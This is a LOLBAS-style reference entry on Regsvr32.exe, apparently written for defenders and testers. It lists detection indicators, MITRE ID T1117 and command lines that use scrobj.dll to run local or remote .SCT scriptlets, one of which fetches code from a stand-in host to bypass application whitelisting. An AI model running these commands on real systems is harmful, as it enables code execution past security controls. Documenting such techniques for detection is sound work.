.. / Regsvr32.exe
Star

Used by Windows to register dlls


Paths:


Resources:
https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md

Acknowledgement:
Casey Smith - @subtee


Detection:
regsvr32.exe getting files from Internet
regsvr32.exe executing scriptlet files



AWL bypass

Execute the specified remote .SCT script with scrobj.dll.
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Usecase:Execute code from remote scriptlet, bypass Application whitelisting
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1117



Execute the specified local .SCT script with scrobj.dll.
regsvr32.exe /s /u /i:file.sct scrobj.dll
Usecase:Execute code from scriptlet, bypass Application whitelisting
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1117



Execute

Execute the specified remote .SCT script with scrobj.dll.
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Usecase:Execute code from remote scriptlet, bypass Application whitelisting
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1117



Execute the specified local .SCT script with scrobj.dll.
regsvr32.exe /s /u /i:file.sct scrobj.dll
Usecase:Execute code from scriptlet, bypass Application whitelisting
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1117